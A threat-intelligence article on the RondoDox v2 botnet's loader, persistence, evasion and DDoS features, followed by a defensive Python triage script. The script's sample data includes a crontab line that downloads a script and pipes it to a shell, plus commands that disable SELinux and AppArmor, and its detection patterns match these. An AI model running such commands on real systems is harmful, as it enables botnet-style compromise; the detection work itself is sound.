RondoDox Botnet V2 Escalates: 75+ Exploits Target IoT and Enterprise Systems
A new iteration of the RondoDox botnet has been uncovered, exhibiting a dramatic escalation in both scale and technical sophistication. Whereas the original variant described in autumn 2024 exploited only a handful of vulnerabilities in surveillance cameras and routers, RondoDox v2 deploys more than seventy-five distinct exploits and has expanded its targets from IoT devices to enterprise applications — a shift that renders the malicious network markedly more dangerous and versatile.
Honeypot telemetry reveals automated attack attempts originating from an IP address in New Zealand; within a short span, more than seventy different payloads were observed, each crafted to exploit flaws in routers and other internet-exposed devices. Infections typically begin with the retrieval of a shell script from a remote server, followed by installation of a binary tailored to the target architecture.
The current wave is notable for its multi-stage chain: the loader determines the CPU architecture, kills competing malware processes, and disables protection mechanisms such as SELinux and AppArmor. Persistence is achieved via a cron job that relaunches the malware at boot. Command-and-control is spread across multiple servers hosted on compromised residential IPs, which complicates efforts to trace and block the botnet's control infrastructure.
RondoDox conceals its configuration with XOR obfuscation (a simple scheme that analysts can reverse once the key is recovered), hides activity behind seemingly benign HTTP requests whose User-Agent strings mimic mobile devices, and implements an extensive arsenal for DDoS operations: HTTP floods disguised as gaming traffic, UDP and SYN floods, and protocol emulation of popular services and games.
The dropper payload carries routines to remove competing malware, purge temporary directories, create a working directory, and fetch the appropriate executable. Dozens of architectures are supported — x86, ARM, MIPS, PowerPC and more — and each deployment includes a success check: if the binary exits with a specific code, the infection halts.
Analysts note that the campaign leaves multiple forensic markers: a hard-coded mailbox string (bang2013[@]atomicmail[.]io) appears in the code, in HTTP headers and in on-disk artefacts, which lets defenders correlate network indicators, filesystem artefacts and process names. Detection signatures and rules for Snort, Suricata and YARA have already been published.
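Pulling those markers together is what a first-pass triage would do: search each artefact source for the published mailbox string and, alongside it, for the persistence and protection-disabling behaviour described above. The script below is an added example, not code from the RondoDox report or from any published signature set. Every sample artefact in it (the HTTP log line, file paths, process list, crontab and shell-script lines) is constructed for illustration; the only indicator taken from the write-up is the mailbox string. The specific commands it matches for disabling SELinux and AppArmor (`setenforce 0`, stopping the AppArmor service) are common techniques assumed to resemble the reported behaviour, not confirmed RondoDox command lines.

```python
"""Triage helper: correlate one IOC and a few behaviours across artefact sources.

Added example for this article, not the botnet's code or a published rule.
All sample data is constructed; only the mailbox string comes from the report.
The protection-disabling commands are assumptions, not confirmed command lines.
"""
import re
from dataclasses import dataclass

# The indicator as published, in defanged form.
MAILBOX_DEFANGED = "bang2013[@]atomicmail[.]io"


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into the literal string a match needs."""
    return ioc.replace("[@]", "@").replace("[.]", ".").replace("hxxp", "http")


MAILBOX = refang(MAILBOX_DEFANGED)

# Behavioural patterns (assumed, see module docstring).
# A cron entry that fetches a script at boot and pipes it straight into a shell.
REBOOT_FETCH_EXEC = re.compile(
    r"^@reboot\s+.*\b(curl|wget)\b.*\|\s*(sh|bash)\b", re.IGNORECASE)
# Common ways of switching off SELinux enforcement or stopping AppArmor.
DISABLE_PROTECTION = re.compile(
    r"\b(setenforce\s+0|systemctl\s+(stop|disable)\s+apparmor|aa-teardown|"
    r"service\s+apparmor\s+stop)\b", re.IGNORECASE)


@dataclass
class Finding:
    source: str    # artefact type the hit came from (http_log, files, ...)
    kind: str      # "ioc" for the mailbox string, "behaviour" for patterns
    evidence: str  # the offending line


def triage(artifacts: dict) -> list:
    """Scan every line of every artefact source; return all findings."""
    findings = []
    for source, lines in artifacts.items():
        for line in lines:
            if MAILBOX in line:
                findings.append(Finding(source, "ioc", line.strip()))
            if source == "crontab" and REBOOT_FETCH_EXEC.search(line):
                findings.append(Finding(source, "behaviour", line.strip()))
            if DISABLE_PROTECTION.search(line):
                findings.append(Finding(source, "behaviour", line.strip()))
    return findings


def correlated_sources(findings: list) -> list:
    """Distinct artefact types in which the mailbox indicator appeared."""
    return sorted({f.source for f in findings if f.kind == "ioc"})


# Constructed sample artefacts (hypothetical paths, header name and addresses;
# 203.0.113.0/24 is a documentation range, not a real C2).
SAMPLE_ARTIFACTS = {
    "http_log": [
        'GET /bins/arm7 HTTP/1.1 Host: 203.0.113.10 '
        'User-Agent: Mozilla/5.0 (Linux; Android 10) '
        'X-Contact: bang2013@atomicmail.io',
        'GET /index.html HTTP/1.1 Host: 203.0.113.10 User-Agent: curl/8.0',
    ],
    "files": ["/tmp/.w/bang2013@atomicmail.io.arm7", "/usr/bin/backup.sh"],
    "processes": ["1234 ./bang2013@atomicmail.io", "1 /sbin/init"],
    "crontab": [
        "@reboot curl -fsSL http://203.0.113.10/x.sh | sh",
        "0 3 * * * /usr/bin/backup.sh",
    ],
    "shell_script": ["setenforce 0", "systemctl stop apparmor", "mkdir -p /tmp/.w"],
}


def demo() -> list:
    """Run the triage over the constructed sample data."""
    return triage(SAMPLE_ARTIFACTS)


if __name__ == "__main__":
    results = demo()
    for f in results:
        print(f"[{f.kind}] {f.source}: {f.evidence}")
    print("indicator seen in:", ", ".join(correlated_sources(results)))
```

The refang step matters in practice: defanged indicators copied from a report never match raw data, so normalise once and search with the literal string. Matching on the mailbox alone gives a high-confidence hit, while the behavioural patterns are deliberately generic and should be treated as leads to review rather than verdicts.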
Compared with the first-generation botnet that emerged last year, RondoDox v2 has expanded its exploit arsenal by roughly 650%. Having moved beyond consumer devices to actively target corporate infrastructure, its breadth and aggressiveness place it among the most menacing botnets of recent years, comparable to Mirai and Gafgyt but with far broader architectural support and more modern evasion techniques.